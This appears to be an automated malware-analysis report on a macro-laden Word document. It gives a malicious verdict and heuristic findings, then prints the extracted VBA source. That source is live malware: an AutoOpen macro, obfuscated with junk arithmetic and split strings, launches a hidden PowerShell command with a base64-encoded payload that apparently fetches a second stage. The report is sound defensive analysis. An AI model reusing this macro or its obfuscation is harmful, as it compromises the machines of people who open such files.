Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro whose Autoopen subroutine calls a helper function that, in turn, invokes Shell(). The string passed to Shell() is assembled at runtime from concatenated fragments (a Chr(vbKeyP) for "P" followed by "owers" + "HeLL -WinDowsTy" + "le hidden -e ..."), so the command is a hidden-window PowerShell invocation with a base64-encoded argument. The encoded command is obfuscated, but appears to be designed to download and execute a second-stage payload. The ClamAV detection and multiple VBA heuristics further support the malicious verdict.
Heuristics (7)

- ClamAV: Doc.Malware.Valyria-6874807-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874807-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16929 bytes |

SHA-256: 6225c36ff8ba644de8c7b1d0a38c3db4ea92ee5d7f7aba831b50bf565e45b6e6

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "WiHVDlBZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ijjsBocKkV()
On Error Resume Next
oTpRRo = Fix(92918 / CSng(32673) * cdwKUc * DFrihC)
VhBn = CDate(44300)
XQOBMM = Fix(82998 / CSng(28936) * MNiYzj * baVaT)
VhBn = CDate(58285)
ijjsBocKkV = FaNnfanm + RFDPOhjzz + VVzBJ + WOwJhCtU + YbvrSZwB + DwzPDN + kYHnjiOW + wJSHf + LRozM + fZiKHaOXnnt + fqLfrMArCM + PRfRvkuHjX
wrObV = Fix(94284 / CSng(21432) * mwwuB * vEkkO)
VhBn = CDate(23372)
End Function
Sub Autoopen()
On Error Resume Next
GtVEZl = Fix(5921 / CSng(13587) * wZtESJ * kVSZHb)
VhBn = CDate(72885)
RkZLfoRMj (ijjsBocKkV)
FijfWl = Fix(80262 / CSng(9929) * OpwtX * LIwEAW)
VhBn = CDate(1601)
End Sub
Function RkZLfoRMj(XYFlAAzUrw)
On Error Resume Next
HlGzPw = Fix(74454 / CSng(81263) * HtzuEX * wGUbpd)
VhBn = CDate(21230)
zLLzZKiUZPp = pPAfTutJG + Shell(kBUGrURHar + (Chr(vbKeyP)) + DKrwzwVz + XYFlAAzUrw + FYOjFt, XQbIIqFb + vbHide + iTSNDR)
NZGRI = Fix(42904 / CSng(71915) * EjYuP * aIfYJr)
VhBn = CDate(1071)
End Function
Attribute VB_Name = "BHkNItCZHi"
Function FaNnfanm()
On Error Resume Next
KOGHdP = Fix(88282 / CSng(75855) * JHCfzd * ufBvlQ)
VhBn = CDate(22037)
DuzZO = "owers" + "HeLL -WinDowsTy" + "le hidden -e IA" + "AuACAAKAAoAEcAd" + "gAgACcAKgBNAE"
mBNrU = Fix(38351 / CSng(44800) * uETZZ * nYwdfR)
VhBn = CDate(83728)
OaKDmr = "QAUgAqACcAKQAuA" + "E4AQQB" + "NAEUAWwAzACwAMQ" + "AxACwAMgBdAC" + "0AagBvAEkA" + "bgAnACc" + "AKQAgACg"
zfbBRU = Fix(22585 / CSng(56963) * uDzUc * BSTmu)
VhBn = CDate(14466)
EvjiKrAisj = "AKAAoACIAew" + "AxADgAfQ" + "B7ADk" + "ANwB9AHsAMQAx" + "AH0AewAxADUAM" + "QB9AHsAMgA3AH0A" + "ewAxAD" + "EANwB9A" + "HsAMwA2AH0AewA"
dDKLrd = Fix(98778 / CSng(16794) * tRFDiP * CCARw)
VhBn = CDate(48378)
zdLGZffVqNz = "3ADYAfQB7" + "ADEAMAA3AH0" + "AewA2ADMAfQB" + "7ADEANAAwA" + "H0AewA1ADQAf" + "QB7AD" + "cAMAB"
cNLWu = Fix(20464 / CSng(24267) * wZWBXq * ciiwJ)
VhBn = CDate(18285)
QJBooEAPO = "9AHsAMQA0ADIAfQ" + "B7ADkAO" + "AB9AHsAMQAxAD" + "gAfQB7ADI" + "ANgB9AHsA" + "NQAzAH0AewAzAH" + "0AewAxADAANAB9" + "AHsAMQAwADg"
PYTmzQ = Fix(68994 / CSng(88954) * cEhiwj * EwXOU)
VhBn = CDate(59880)
DzuVvkFTdhs = "AfQB7ADAAf" + "QB7ADQAOAB" + "9AHsANAAyA" + "H0AewA1ADEAfQB" + "7ADYAMgB" + "9AHsA" + "MQAxADA" + "AfQB7ADM"
FaNnfanm = DuzZO + OaKDmr + EvjiKrAisj + zdLGZffVqNz + QJBooEAPO + DzuVvkFTdhs
End Function
Function RFDPOhjzz()
On Error Resume Next
hsczZS = Fix(75193 / CSng(3936) * MwzmC * LwvCj)
VhBn = CDate(87671)
siCuhOhljc = "ANQB9AHsAMgA4A" + "H0AewAxAD" + "MAfQB7A" + "DcAMwB" + "9AHsAMQA" + "wADMAf" + "QB7ADE" + "AMwAzA"
qIGwbZ = Fix(97622 / CSng(72975) * LkrmuW * JbDap)
VhBn = CDate(41052)
SMitAjR = "H0AewAxADMA" + "OAB9AHsANwA4AH0" + "AewA3ADEAfQB7AD" + "gAOAB9AHsANQ" + "A5AH0AewA" + "zADMAfQB" + "7ADMAMQB9" + "AHsAMQ"
BuEwmb = Fix(37167 / CSng(34898) * nkBUrd * NDdRkM)
VhBn = CDate(90508)
BlBjvWwqN = "A5AH0AewAxADIA" + "OQB9AH" + "sAOQB" + "9AHsAMQAzA" + "DcAfQB7ADYAO" + "QB9AHsAMQB9AH"
Oodla = Fix(62904 / CSng(36636) * UVFBW * MKbtpD)
VhBn = CDate(4677)
CDYwS = "sAMwA5AH0AewAxA" + "DUANAB9AHsANw" + "A1AH0AewA2" + "ADcAfQB7AD" + "kANQB9A" + "HsANgB9" + "AHsAMQAzA"
CbjkpX = Fix(22874 / CSng(7070) * oznhz * hrOUch)
VhBn = CDate(96689)
dVotPWTDMB = "DQAfQB7A" + "DMANAB9AHsAMgA" + "wAH0AewA3ADIAf" + "QB7ADEA" + "NAB9AHsA"
RFDPOhjzz = siCuhOhljc + SMitAjR + BlBjvWwqN + CDYwS + dVotPWTDMB
End Function
Function VVzBJ()
On Error Resume Next
bUkrTq = Fix(83084 / CSng(45289) * NWmBFp * vvRTRC)
VhBn = CDate(67769)
kmUCrOK = "MQA0ADkAfQB7A" + "DMAMgB" + "9AHsAMQA0A" + "DUAfQB7ADQANAB9" + "AHsAMwAwAH0Ae" + "wAxADAANgB9AH" + "sANAAz" + "AH0AewA2ADYA"
OLtBaj = Fix(50119 / CSng(20967) * qEQEj * NKQHZL)
VhBn = CDate(22550)
QGblF = "fQB7ADkAMwB9AH" + "sAMQA2AH0" + "AewAxADUAfQB7A" + "DEAMQA2" + "AH0AewA" + "1ADAAfQ" + "B7ADY"
cBXYjQ = Fix(58297 / CSng(38750) ... (truncated)
```